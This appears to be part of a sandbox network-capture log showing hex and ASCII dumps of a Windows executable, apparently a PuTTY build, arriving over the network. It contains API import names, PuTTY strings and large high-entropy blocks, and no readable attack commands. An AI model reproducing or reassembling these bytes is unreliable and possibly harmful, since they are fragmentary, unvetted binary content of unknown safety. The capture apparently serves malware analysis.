2023-10-05 16:48:07 UTC	993	IN	Data Raw: 00 20 00 22 00 54 00 68 00 69 00 73 00 20 00 70 00 61 00 63 00 6b 00 65 00 74 00 20 00 74 00 79 00 70 00 65 00 20 00 73 00 68 00 6f 00 75 00 6c 00 64 00 20 00 6e 00 65 00 76 00 65 00 72 00 20 00 68 00 61 00 76 00 65 00 20 00 63 00 6f 00 6d 00 65 00 20 00 66 00 72 00 6f 00 6d 00 20 00 22 00 20 00 22 00 63 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 69 00 6f 00 6e 00 32 00 2e 00 63 00 22 00 00 00 66 00 61 00 6c 00 73 00 65 00 20 00 26 00 26 00 20 00 22 00 74 00 68 00 69 00 73 00 20 00 63 00 68 00 61 00 6e 00 6e 00 65 00 6c 00 20 00 74 00 79 00 70 00 65 00 20 00 73 00 68 00 6f 00 75 00 6c 00 64 00 20 00 6e 00 65 00 76 00 65 00 72 00 20 00 72 00 65 00 63 00 65 00 69 00 76 00 65 00 20 00 4f 00 50 00 45 00 4e 00 5f 00 43 00 4f 00 4e 00 46 00 49 00 52 00 4d 00 41 00 Data Ascii: "This packet type should never have come from " "connection2.c"false && "this channel type should never receive OPEN_CONFIRMA
2023-10-05 16:48:07 UTC	1000	IN	Data Raw: 00 2d 00 69 00 6e 00 00 00 74 00 61 00 2d 00 69 00 6e 00 00 00 73 00 61 00 2d 00 69 00 6e 00 00 00 70 00 61 00 2d 00 69 00 6e 00 00 00 65 00 73 00 2d 00 68 00 6e 00 00 00 65 00 6e 00 00 00 00 00 7a 00 68 00 2d 00 63 00 6e 00 00 00 6d 00 73 00 2d 00 62 00 6e 00 00 00 67 00 65 00 72 00 6d 00 61 00 6e 00 2d 00 61 00 75 00 73 00 74 00 72 00 69 00 61 00 6e 00 00 00 70 00 6f 00 72 00 74 00 75 00 67 00 75 00 65 00 73 00 65 00 2d 00 62 00 72 00 61 00 7a 00 69 00 6c 00 69 00 61 00 6e 00 00 00 00 00 61 00 75 00 73 00 74 00 72 00 61 00 6c 00 69 00 61 00 6e 00 00 00 00 00 64 00 75 00 74 00 63 00 68 00 2d 00 62 00 65 00 6c 00 67 00 69 00 61 00 6e 00 00 00 66 00 72 00 65 00 6e 00 63 00 68 00 2d 00 62 00 65 00 6c 00 67 00 69 00 61 00 6e 00 00 00 00 00 62 00 65 00 6c 00 Data Ascii: -inta-insa-inpa-ines-hnenzh-cnms-bngerman-austrianportuguese-brazilianaustraliandutch-belgianfrench-belgianbel
2023-10-05 16:48:07 UTC	1008	IN	Data Raw: 00 dd f2 0f 00 78 db 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc db 0f 00 c6 db 0f 00 d6 db 0f 00 f0 db 0f 00 06 dc 0f 00 14 dc 0f 00 2a dc 0f 00 3a dc 0f 00 46 dc 0f 00 5a dc 0f 00 66 dc 0f 00 76 dc 0f 00 88 dc 0f 00 96 dc 0f 00 a4 dc 0f 00 b0 dc 0f 00 ca dc 0f 00 dc dc 0f 00 ee dc 0f 00 fe dc 0f 00 0e dd 0f 00 28 dd 0f 00 3c dd 0f 00 48 dd 0f 00 58 dd 0f 00 66 dd 0f 00 80 dd 0f 00 8c dd 0f 00 9e dd 0f 00 b6 dd 0f 00 ce dd 0f 00 e0 dd 0f 00 f4 dd 0f 00 fe dd 0f 00 0a de 0f 00 16 de 0f 00 28 de 0f 00 34 de 0f 00 44 de 0f 00 54 de 0f 00 62 de 0f 00 6e de 0f 00 7c de 0f 00 90 de 0f 00 9c de 0f 00 ac de 0f 00 bc de 0f 00 c8 de 0f 00 e0 de 0f 00 f2 de 0f 00 00 00 00 00 02 df 0f 00 1e df 0f 00 2e df 0f 00 42 df 0f 00 5c df 0f 00 00 00 Data Ascii: x*:FZfv(<HXf(4DTbn\|.B\
2023-10-05 16:48:07 UTC	1016	IN	Data Raw: 65 72 6d 69 6e 61 74 65 50 72 6f 63 65 73 73 00 00 b8 05 54 6c 73 41 6c 6c 6f 63 00 00 b9 05 54 6c 73 46 72 65 65 00 ba 05 54 6c 73 47 65 74 56 61 6c 75 65 00 bb 05 54 6c 73 53 65 74 56 61 6c 75 65 00 c7 05 55 6e 68 61 6e 64 6c 65 64 45 78 63 65 70 74 69 6f 6e 46 69 6c 74 65 72 00 00 ca 05 55 6e 6d 61 70 56 69 65 77 4f 66 46 69 6c 65 00 f1 05 57 61 69 74 46 6f 72 53 69 6e 67 6c 65 4f 62 6a 65 63 74 00 f7 05 57 61 69 74 4e 61 6d 65 64 50 69 70 65 41 00 00 18 06 57 69 64 65 43 68 61 72 54 6f 4d 75 6c 74 69 42 79 74 65 00 2b 06 57 72 69 74 65 43 6f 6e 73 6f 6c 65 57 00 2c 06 57 72 69 74 65 46 69 6c 65 00 ac 01 53 68 65 6c 6c 45 78 65 63 75 74 65 41 00 00 00 43 68 6f 6f 73 65 43 6f 6c 6f 72 41 00 00 02 00 43 68 6f 6f 73 65 46 6f 6e 74 41 00 0b 00 47 65 74 4f Data Ascii: erminateProcessTlsAllocTlsFreeTlsGetValueTlsSetValueUnhandledExceptionFilterUnmapViewOfFileWaitForSingleObjectWaitNamedPipeAWideCharToMultiByte+WriteConsoleW,WriteFileShellExecuteAChooseColorAChooseFontAGetO
2023-10-05 16:48:07 UTC	1024	IN	Data Raw: 00 00 00 00 00 00 00 01 00 09 04 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 09 04 00 00 c0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 09 04 00 00 d0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 09 04 00 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 09 04 00 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 09 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 09 04 00 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 09 04 00 00 20 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 09 04 00 00 30 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 09 04 00 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 09 04 00 00 50 04 Data Ascii: 0@P
2023-10-05 16:48:07 UTC	1032	IN	Data Raw: 70 19 f1 08 70 10 f1 04 70 00 e1 00 70 00 e1 00 70 01 c1 00 70 03 01 ff f0 00 00 ff f0 00 00 00 00 80 00 3f ff 00 00 1f ff 00 00 0f df 00 00 07 8f 00 00 07 07 80 00 06 03 c0 00 04 07 e0 00 08 0f e0 00 30 1f e0 00 20 3f e0 00 00 7f e0 00 00 ff e0 00 01 ff e0 00 03 ff e0 00 00 07 e0 00 00 03 f0 00 00 01 f8 00 00 00 ff c0 00 00 fc 80 00 00 f0 00 00 00 e0 00 00 01 c0 04 00 07 c0 0c 00 07 80 04 00 07 86 04 00 07 ce 0c 00 07 fc 0c 00 07 f8 1c 00 07 f8 3c 00 07 fc fe 00 07 ff ff 00 0f 28 00 00 00 30 00 00 00 60 00 00 00 01 00 01 00 00 00 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 7f ff ff c0 00 00 00 00 7f ff ff e0 00 00 00 00 7f ff 01 f0 00 00 00 00 7f ff ff f8 00 00 00 00 7f ff ff f8 01 80 Data Ascii: pppppp?0 ?<(0`
2023-10-05 16:48:07 UTC	1039	IN	Data Raw: 55 8e 5c 14 2f 65 72 72 6f 72 73 2d 67 61 72 62 6c 65 64 2e 68 74 6d 6c 01 aa 83 31 89 66 1b 2f 65 72 72 6f 72 73 2d 68 6f 73 74 6b 65 79 2d 61 62 73 65 6e 74 2e 68 74 6d 6c 01 a8 df 2d 8c 5c 1a 2f 65 72 72 6f 72 73 2d 68 6f 73 74 6b 65 79 2d 77 72 6f 6e 67 2e 68 74 6d 6c 01 a8 ec 09 8c 7e 15 2f 65 72 72 6f 72 73 2d 69 6e 74 65 72 6e 61 6c 2e 68 74 6d 6c 01 a9 be 27 88 60 13 2f 65 72 72 6f 72 73 2d 6d 65 6d 6f 72 79 2e 68 74 6d 6c 01 a9 ae 4b 8f 5c 14 2f 65 72 72 6f 72 73 2d 6e 6f 2d 61 75 74 68 2e 68 74 6d 6c 01 a9 ed 3a 87 1b 14 2f 65 72 72 6f 72 73 2d 72 65 66 75 73 65 64 2e 68 74 6d 6c 01 a9 d4 44 8d 63 19 2f 65 72 72 6f 72 73 2d 73 73 68 2d 70 72 6f 74 6f 63 6f 6c 2e 68 74 6d 6c 01 a9 8c 55 8c 16 18 2f 65 72 72 6f 72 73 2d 74 6f 6f 6d 61 6e 79 61 75 Data Ascii: U\/errors-garbled.html1f/errors-hostkey-absent.html-\/errors-hostkey-wrong.html~/errors-internal.html'`/errors-memory.htmlK\/errors-no-auth.html:/errors-refused.htmlDc/errors-ssh-protocol.htmlU/errors-toomanyau
2023-10-05 16:48:07 UTC	1047	IN	Data Raw: 2d 73 69 6e 67 6c 65 2d 74 68 72 65 61 64 65 64 2e 68 74 6d 6c 01 b8 ef 4d 94 24 0f 2f 75 64 70 2d 73 6d 61 6c 6c 2e 68 74 6d 6c 01 b8 de 47 91 06 18 2f 75 64 70 2d 73 73 68 2d 63 6f 72 6f 75 74 69 6e 65 73 2e 68 74 6d 6c 01 b9 99 47 93 2e 10 2f 75 64 70 2d 74 72 61 69 74 73 2e 68 74 6d 6c 01 b9 ac 75 81 9a 08 09 2f 75 64 70 2e 68 74 6d 6c 01 b7 de 72 8e 07 1a 2f 75 73 69 6e 67 2d 63 68 61 6e 67 65 73 65 74 74 69 6e 67 73 2e 68 74 6d 6c 01 83 a4 4b 8a 58 13 2f 75 73 69 6e 67 2d 63 6c 65 61 6e 75 70 2e 68 74 6d 6c 01 85 a3 2d 88 3f 19 2f 75 73 69 6e 67 2d 63 6d 64 6c 69 6e 65 2d 61 67 65 6e 74 2e 68 74 6d 6c 01 86 b4 4c 8b 0e 1d 2f 75 73 69 6e 67 2d 63 6d 64 6c 69 6e 65 2d 61 67 65 6e 74 61 75 74 68 2e 68 74 6d 6c 01 86 ab 44 89 08 18 2f 75 73 69 6e 67 2d Data Ascii: -single-threaded.htmlM$/udp-small.htmlG/udp-ssh-coroutines.htmlG./udp-traits.htmlu/udp.htmlr/using-changesettings.htmlKX/using-cleanup.html-?/using-cmdline-agent.htmlL/using-cmdline-agentauth.htmlD/using-
2023-10-05 16:48:07 UTC	1055	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2023-10-05 16:48:07 UTC	1063	IN	Data Raw: ee a2 2c fe 86 a5 a6 dc f6 f2 5f 4a b7 79 72 72 85 74 bc 86 f1 a6 77 cb f7 ee 63 b9 28 d1 48 6e 8c 72 25 37 94 37 d9 09 ad 33 4b f1 9d 42 d5 1a 87 c9 a6 1c 65 f3 98 c0 36 6c f0 d5 fd b3 a6 82 b3 c4 ee de 72 4a 62 42 58 96 4a 79 3f 6f f2 b3 a5 eb f5 24 0d bb 14 96 8a 99 6b 0e 30 85 71 8e 07 82 65 0a 06 f6 30 f0 10 0c 54 c3 54 d5 d0 de a6 dc 7e f2 5a fe d3 6f 6a c0 9b 83 7b 76 12 42 7e b7 07 9c be fc 35 28 da df 76 71 a5 83 98 77 72 2f 46 ee 67 8d 9c b2 a0 5d 5d 89 0b e6 df b6 89 97 80 d9 35 59 5e f9 76 f4 3b 94 ff a5 7c e5 d9 41 a2 cf 19 16 5a e2 b7 a9 e9 bb 41 89 76 ce 58 6f 77 69 8f 75 8a 03 ce f5 f7 b9 a7 2f fb ce 9c 6a 0f 12 9a 06 9a 2a 1b b1 e3 6b 73 51 e2 e4 7c 6b f5 ed 5f 8e 63 0d dc c6 3d ea 7e 63 23 d5 f6 5e ee 8f 58 d7 e8 e5 e6 55 ba a7 65 f8 37 Data Ascii: ,_Jyrrtwc(Hnr%773KBe6lrJbBXJy?o$k0qe0TT~Zoj{vB~5(vqwr/Fg]]5Y^v;\|AZAvXowiu/j*ksQ\|k_c=~c#^XUe7
2023-10-05 16:48:07 UTC	1071	IN	Data Raw: 57 b0 31 ed 2a 01 08 c1 25 12 df 90 8a 9d fd cf dd 22 c9 71 f6 24 21 33 60 00 f0 92 7e de 43 52 c1 59 b6 40 f6 3e 90 0f 24 11 6f bf 7e b1 75 f8 99 a8 03 5e 24 ec 6b 0c 60 52 0a 24 30 8c b5 22 48 21 1e 1a c7 c1 a3 43 22 dc 20 25 c5 e9 01 42 a9 47 28 18 d7 54 51 59 92 12 4b 07 2f 84 f5 44 00 09 06 ea af e0 10 05 95 0e 43 28 90 21 02 05 09 41 51 02 a4 11 14 28 10 61 14 a4 94 21 3a a0 7d ac 4e 0e 02 c0 00 22 8d 9d c0 03 95 2a 50 26 84 0e 8f 3d 53 19 3f 32 00 af 7c e4 3d 64 9f d8 cf ed 23 7c d6 b3 2a 10 9c a2 77 21 8e f9 e0 5e 33 fb 76 56 62 02 41 07 50 5f fd 64 ae 0e 3d 3f cb c2 25 81 79 16 51 07 14 d4 51 80 0f d9 51 08 8a 21 01 88 28 27 a1 74 22 14 85 00 4f 15 6a 6d ff ca b1 b4 c8 d4 76 69 02 28 66 1a de 47 98 be 8f 0b 9e 4e 30 20 e4 19 71 b1 27 6d 9b bc 1d Data Ascii: W1%"q$!3`~CRY@>$o~u^$k`R$0"H!C" %BG(TQYK/DC(!AQ(a!:}N"P&=S?2\|=d#\|*w!^3vVbAP_d=?%yQQQ!('t"Ojmvi(fGN0 q'm
2023-10-05 16:48:07 UTC	1078	IN	Data Raw: cd b9 e8 65 4c 52 d3 fe e2 67 e0 b7 6a 52 e5 b6 3d 35 04 26 33 1d 0f 8b 8a 6b f1 38 f6 c1 06 7b be 40 c4 1b c3 eb 82 44 ae c5 3d 0e 83 3a 5d 47 3b da 37 0c 73 85 82 60 08 25 3c 4c 6d 9d eb 23 08 70 ac 5d 40 50 ad 86 69 03 fe 60 11 0d 3e 9f 0f 42 36 04 c9 97 ef 55 00 0f 10 10 03 00 05 00 33 44 36 33 00 00 0f 64 70 d9 d7 7e 61 a0 04 6f b9 91 49 1b d3 14 6a 28 89 c6 86 c2 93 a2 6d f2 49 7b b8 19 b2 00 a4 df 55 97 cd 96 c7 b6 03 1c fe dd 24 ff 01 c0 0c 15 d9 8c 00 80 15 14 c7 2c 7c ce cc b9 84 c4 8b b3 e9 13 5b 62 2d 9d 93 ce e7 e2 e7 40 a0 33 dd 3d a1 e6 ee ee 19 6a d8 bc 5b 83 84 62 aa 63 1c 03 40 52 90 2a c5 1e 03 64 00 e5 55 7b 0a 90 90 ac b2 2a 7e c2 84 ac be 2a e5 43 c7 20 b0 54 5e 85 e5 c3 87 7c d0 cb 4f aa bc 0a 1d 7a 00 c3 03 00 34 32 76 57 45 00 be Data Ascii: eLRgjR=5&3k8{@D=:]G;7s`%<Lm#p]@Pi`>B6U3D63dp~aoIj(mI{U$,\|[b-@3=j[bc@RdU{~*C T^\|Oz42vWE
2023-10-05 16:48:07 UTC	1086	IN	Data Raw: bb 47 35 06 56 8b 2c 61 6a f4 8a 07 94 2d ab d5 eb b4 bf 26 4b 23 2c 55 8f ed 46 a6 7d 1c 15 77 9c c0 9c 7b f4 dc 6b 23 1a c8 66 7f 61 87 f7 3f 55 e8 18 af 90 e0 1b 02 f1 ed f3 23 bf 2c f6 36 cf b6 ad d4 b9 53 d6 58 eb 20 ea 01 7f 71 d7 26 36 c0 66 c0 53 16 32 70 8f 1a 26 75 a0 01 91 ce 43 6f 51 c0 59 6d 09 af f0 ae ac e3 e4 04 a3 d6 ee 4c eb 74 36 e9 cc fe 58 42 aa 4d 92 a0 40 eb 6f 67 f9 6b f0 35 a7 92 ea 43 18 be 8d 0c 0f 0b 59 4a db a9 af 6c 65 de 15 68 8f 8c 57 66 a1 dd 59 9b 11 a5 6d 74 06 7b 52 82 ad ed 82 d0 63 bc 02 42 3c cc 51 03 49 8c 2f 43 37 28 9a 0a 98 ea b5 13 34 8f ce 62 17 60 cc 46 a3 30 41 81 3e 43 be f0 f5 cb 0f 05 45 a9 be 41 92 b6 ee 7b 56 2b 91 07 94 96 dd fa d3 61 4a ba b4 06 5e 54 04 c4 41 69 4a b2 a5 09 7d 9a 91 46 ba 5a 26 a0 98 Data Ascii: G5V,aj-&K#,UF}w{k#fa?U#,6SX q&6fS2p&uCoQYmLt6XBM@ogk5CYJlehWfYmt{RcB<QI/C7(4b`F0A>CEA{V+aJ^TAiJ}FZ&
2023-10-05 16:48:07 UTC	1094	IN	Data Raw: aa ee 60 72 e6 30 b5 e2 d4 40 52 f6 21 35 00 6e fb a6 49 61 0b 78 8a d3 ca 17 b1 4d 9b f0 c9 02 43 92 53 28 eb 40 e4 e2 bb 7f f7 d1 f5 f4 61 bd b7 05 34 3a 5f 2f 2a 67 99 df 17 74 98 de dd a1 e4 f3 73 db 0f 7d 82 96 31 a7 d1 8e 1d ca c0 98 7a 21 d3 b2 dd ca 6e a8 ec a1 1f de fa 96 5f d9 c7 5d ad 33 f4 d9 c8 ea 73 a1 ec 51 ed fd 7b 60 54 cd ed 51 3e aa 42 e4 54 7f a7 18 19 ee f0 5d 13 45 6a 3a 4f 77 68 fd e6 1d d4 a2 9d 0c b1 f0 73 e0 4a 0e a9 06 8a 50 2c ca 89 93 46 c2 29 d8 bc 3e 2b b9 69 cf 26 9b d4 aa 77 eb ca 51 12 70 11 b8 da f1 06 14 2f f0 29 43 e0 e4 3e 1b 34 ef 3c 7a 37 04 08 90 bb 03 e4 a8 91 0b cf dd 6e a1 b1 6e b0 bd d9 0c 81 da d7 e6 47 61 85 23 9c 44 b2 a4 c0 36 f4 49 0b 27 a7 4b 27 80 04 24 8d 83 0a 36 38 91 d3 02 20 8d 14 86 63 38 41 9c 3b Data Ascii: `r0@R!5nIaxMCS(@a4:_/*gts}1z!n_]3sQ{`TQ>BT]Ej:OwhsJP,F)>+i&wQp/)C>4<z7nnGa#D6I'K'$68 c8A;
2023-10-05 16:48:07 UTC	1102	IN	Data Raw: f0 da 32 9b 76 16 d2 8d 00 e4 1b 43 ec b8 74 82 da e4 b3 74 ae 57 6e c3 a7 97 3f 69 c3 b3 6b ff 91 f2 6a 24 e7 17 6e 23 7a b7 59 a2 90 da 4c ad 3e cb f6 45 4d 14 99 85 95 81 dc 34 51 3b a1 c1 0c f7 27 db 3b 8d d2 3a 2f fb 75 3c e5 08 92 88 44 c8 c6 82 69 30 25 c0 36 d4 7b 34 91 2a 80 1b aa 54 a5 1e d0 1e e2 78 6c d6 3a 58 89 03 f5 ae 94 5b e2 db e4 1c 5f fd 93 5e c2 9e f2 8f 7f 56 a7 88 05 fb eb f6 68 96 74 66 b6 76 73 24 03 fb 72 75 5d b5 34 88 2d c5 86 c3 31 aa 9b c6 39 07 81 f2 e4 b0 99 e2 79 75 e8 9c 25 53 dc e6 42 94 a4 54 d4 8f 53 ea 75 6a fa 51 89 c4 6a 93 9a 75 6d ad b4 33 3c d4 81 ac 56 b7 22 a5 52 c9 0d 07 7b 5b 04 3f 69 35 24 93 8f 8f ec 4d db 3f 77 cd 3e 8f cf 3b 01 fa fd 07 81 b9 a1 fe 0d 27 c8 55 fe a7 41 01 91 e3 c0 3f 1e 47 a1 b4 45 fb d0 Data Ascii: 2vCttWn?ikj$n#zYL>EM4Q;';:/u<Di0%6{4*Txl:X[_^Vhtfvs$ru]4-19yu%SBTSujQjum3<V"R{[?i5$M?w>;'UA?GE
2023-10-05 16:48:07 UTC	1110	IN	Data Raw: 5d 89 cb 59 24 38 25 4a 9c 44 fb aa f5 e4 c5 61 02 4a fe d7 05 e0 6f 2c 9d 0a d7 59 75 75 9e f3 e7 38 62 09 82 05 43 61 a3 f3 a2 e4 72 43 65 10 96 82 cd f9 dd 84 a3 6a ae 0a 5f 45 01 fb 01 ac e1 d8 9e 85 da 9e 3e cc ea 51 ee ea 81 5a 3c 8c 7a 80 05 8b cb 36 71 9d 50 cd 66 bc c8 ed 11 76 5e fa 52 5f 2c c8 c5 6b 83 85 a1 a0 6e 2f a2 f6 89 c2 be 44 02 04 95 50 ae ba 37 14 c4 3b dc 9c 54 70 de 60 90 50 d8 fe 33 a4 3d fa e8 46 c1 6a 95 01 81 8e 6a 86 d4 5c f8 4b 7f 1e c1 c8 c3 34 ff b8 2c d9 e9 60 11 07 ee 6b f8 79 e8 22 ae dd ff a3 19 d2 de b3 24 7f 2f 0d da f8 f7 57 40 f6 aa 57 9e 6f 8e c5 ee 9f a1 3b dd 8d de b7 64 e8 41 72 e3 b7 52 e9 48 9f 80 2e e8 b3 32 71 9d e3 6d b3 ea 90 d4 f8 33 2c 43 84 b3 ab 65 70 28 62 cc 6c 95 57 da 05 00 1b 71 dd 21 51 a4 62 5a Data Ascii: ]Y$8%JDaJo,Yuu8bCarCej_E>QZ<z6qPfv^R_,kn/DP7;Tp`P3=Fjj\K4,`ky"$/W@Wo;dArRH.2qm3,Cep(blWq!QbZ
2023-10-05 16:48:07 UTC	1118	IN	Data Raw: 73 1c 91 58 ec dd 23 e3 1e 17 d6 13 5c 54 ff 98 4a f4 37 a9 c4 f2 d5 81 02 d5 18 cf 0a d6 f4 38 91 6f c2 6c 1c a2 40 7c ae 66 7d 1a ca 1c 65 be b2 85 a9 f5 aa 92 4d 42 f2 a7 d1 29 e8 23 d0 50 85 ee da d3 28 90 21 5e f2 a7 a4 06 e2 14 06 77 23 42 21 b6 e8 3c 31 ea ed 0c 6e 6d ec ce 60 cb 21 67 8b 22 60 37 a4 2d eb aa 3c 76 84 ad 59 63 1c a4 49 58 5d 16 58 d8 73 7c b9 7f 51 46 b7 63 0e c5 62 34 a4 10 cf 8c 59 1d cc 2f 3d c0 a7 ba bf 33 fe e9 16 3b 6f b4 9e 59 dd 89 56 28 d0 d0 bc b5 8e 2f 2f fb 93 6b 3d 60 1b 20 39 92 b7 a9 48 73 34 07 72 c4 38 0a 69 76 0a 16 67 58 c9 ec 20 9e 23 0c b2 09 03 51 1d 83 9a 96 60 ef 22 87 94 52 92 45 f7 ee d2 65 c3 19 bb 27 91 ef 93 1d c5 6f 40 11 db 22 bd 42 11 a6 43 92 a5 da 26 b2 82 46 2a 26 a2 09 9b d4 ed 68 12 c6 06 57 d2 Data Ascii: sX#\TJ78ol@\|f}eMB)#P(!^w#B!<1nm`!g"`7-<vYcIX]Xs\|QFcb4Y/=3;oYV(//k=` 9Hs4r8ivgX #Q`"REe'o@"BC&F*&hW
2023-10-05 16:48:07 UTC	1125	IN	Data Raw: 0c 62 a4 66 0d ca 48 45 93 c9 25 19 11 b0 e0 30 13 a6 a3 1a fe be 4b b5 b7 64 3b e0 39 34 33 03 b2 02 2b 37 ec 82 14 9c 6f 43 62 5a 08 ac 35 ef ce f8 64 02 c4 7b ed a0 01 a9 a1 7c e2 08 65 66 38 ff 0c 12 0c 78 50 e3 0e 42 b9 6d 17 b7 db 42 d2 07 2d f0 4c 94 b2 e0 cd a9 b6 36 b9 12 29 c0 4f 64 97 8b 96 8c 00 77 32 50 6d e1 e6 9f e3 93 bd 16 7e 7b 85 27 f7 f2 fa f4 49 2f 85 41 3f 0e 7b 75 4b e5 c0 a2 c9 1a 2c a9 38 7e 1c 59 c8 5c 83 f3 70 a6 24 dd d4 be 32 e1 5f 3f b9 cf 8b 51 d2 da c5 ee 17 23 0f 64 af 45 4d e6 37 4c 3f 21 46 34 ee 6c 3e fd de ae 5b 25 ee 0c 77 0a 76 b6 bd 77 69 c4 a4 03 49 8e 40 00 03 d1 c0 22 35 b0 a9 ac 8d 63 0f a3 0b 98 9f 88 6c 4e 8c 3e 8f 6a fe 5f 15 5e 70 a4 32 b3 41 3f ef da e1 fa d5 57 0e d6 98 61 2c 2e 39 ce 26 5e 61 09 20 60 c3 Data Ascii: bfHE%0Kd;943+7oCbZ5d{\|ef8xPBmB-L6)Odw2Pm~{'I/A?{uK,8~Y\p$2_?Q#dEM7L?!F4l>[%wvwiI@"5clN>j_^p2A?Wa,.9&^a `
2023-10-05 16:48:07 UTC	1133	IN	Data Raw: 70 79 43 cf 07 15 9f b2 f1 e6 32 03 f1 22 7c 38 cb 78 ac 70 95 1e cf de 8c 65 3f 88 1e fd a2 c9 31 c5 23 d3 23 e8 28 84 dd 0e 09 02 e9 d8 b0 f4 44 5d 0b a1 c9 40 35 91 cd ee e7 3d ef ae 21 d9 e8 4f 3b 76 13 fb 58 be b1 b3 6c 6a d4 7d ad 03 c2 9e 22 f4 3a 5a 42 c0 93 6e f8 2c cb 77 d0 03 1a 66 64 fe 37 83 cd ee 2d f0 8d 11 a4 04 3c 86 d4 38 63 38 97 bc 5a 31 7b d9 20 bb 6f 27 1f b0 df 95 d6 66 51 58 b9 13 9e 1d da bd 49 36 e3 18 ff bc ca 33 6c df 7c e9 e7 64 61 e6 fd 8b 46 52 ee f1 94 5f 34 b5 66 c9 e4 5e 9f da 9c 47 aa ad 6a ee 87 bb 9c ab e0 07 46 23 f2 1a 93 ea b5 31 1a 73 e9 e7 eb 21 3b fe dc bc 31 de 14 31 11 5b 14 8e a8 1f 99 b8 01 37 8a 22 81 55 3e 7b 46 e3 68 dc 0f 11 62 b3 6b 08 97 3a 01 ab a4 c8 c9 83 86 ba e9 06 04 48 eb b4 5b eb d9 31 55 30 7b Data Ascii: pyC2"\|8xpe?1##(D]@5=!O;vXlj}":ZBn,wfd7-<8c8Z1{ o'fQXI63l\|daFR_4f^GjF#1s!;11[7"U>{Fhbk:H[1U0{
2023-10-05 16:48:07 UTC	1141	IN	Data Raw: 95 76 83 bb ab c2 97 87 fb bd 7b 05 c4 2a 7d 7f 3d 69 8a be 80 5c 42 f7 e4 4e f8 69 93 63 f2 ef 0a 8e 20 21 1d c1 0b b7 0b e0 9f 9c ce 96 5d 74 92 6a 40 1f a1 af 13 89 ef 4b 1c 78 55 0a 91 30 de f2 44 85 8d 28 a1 43 9a 5b 24 06 e5 a0 98 fd 9b 18 d5 5d 62 c7 31 85 b6 1a 8d ad 5f 19 b2 ab 6e dd 88 61 63 b6 aa f0 c5 7e ad 42 30 28 36 13 07 04 31 03 94 b9 3c de e1 03 ad 01 33 d8 6d 7e c5 c7 43 07 07 8b ee 0e a1 5c 1b fd 58 64 a2 b0 e0 45 c3 2b 86 0c db a7 f3 c0 1b 5e 33 92 d3 ad cf a4 05 42 6c 9b b9 5a e3 28 71 e1 55 dc ca 8b 80 3b 15 44 a3 43 31 9c b2 7c 61 c5 4d ea ba 32 a9 84 e6 c0 e6 50 dd 07 57 7e 0c b2 80 79 d8 64 00 51 73 c6 11 a5 46 67 85 74 03 5f 36 27 27 b3 27 5d 36 6d 8e 99 3a 76 b8 d9 89 c7 15 1f c2 7c d9 9a 02 f3 c9 83 64 74 1e 0b 83 df b4 33 c2 Data Ascii: v{*}=i\BNic !]tj@KxU0D(C[$]b1_nac~B0(61<3m~C\XdE+^3BlZ(qU;DC1\|aM2PW~ydQsFgt_6''']6m:v\|dt3
2023-10-05 16:48:07 UTC	1149	IN	Data Raw: df d5 a5 b7 b4 63 f8 1c cd 96 04 28 f2 8e a1 6c 60 9f 80 a3 31 af ee 91 2a eb 00 f1 92 a4 03 2a 66 a8 f3 ed 1e 88 07 1b 06 a2 cf fe 5b ff bd 20 17 9e 5f c5 e8 a1 5f 84 58 c0 a5 6a 11 e5 61 ca a3 c8 fe 0f 04 3e 03 f0 04 14 53 81 68 91 81 0a 53 6a f8 96 5d 3f 58 bf 8f 33 e9 1f 63 49 fd 79 1c 1f b9 58 3e aa 87 6a e0 de de 09 f5 b7 02 7c 05 be dc 39 2e 8c 1b 31 31 7a 75 7d 7a d6 68 63 7f 85 6e df ea 31 ee 03 b7 f0 86 5f 8a dd 7a fc 57 5f 2b 74 4f ae 76 ed 30 28 41 f1 05 b6 7f f6 9d 31 39 eb 66 b7 da 1a b8 6b cd 4e 60 f7 97 32 99 98 1c 8d ab 02 10 7e 43 8b 4a 07 da fc 8e a3 18 5c 88 bb 40 f1 cd da d9 ba 47 c4 6a ed e6 00 fc cc e6 fb dd 49 2b 72 42 de fb a2 68 85 bb 4f d0 ac 2f e0 17 ae 40 82 13 eb 86 c0 f9 30 7c d7 9c db 01 bf c0 0a ab 50 12 67 14 da 95 86 85 Data Ascii: c(l`1**f[ __Xja>ShSj]?X3cIyX>j\|9.11zu}zhcn1_zW_+tOv0(A19fkN`2~CJ\@GjI+rBhO/@0\|Pg
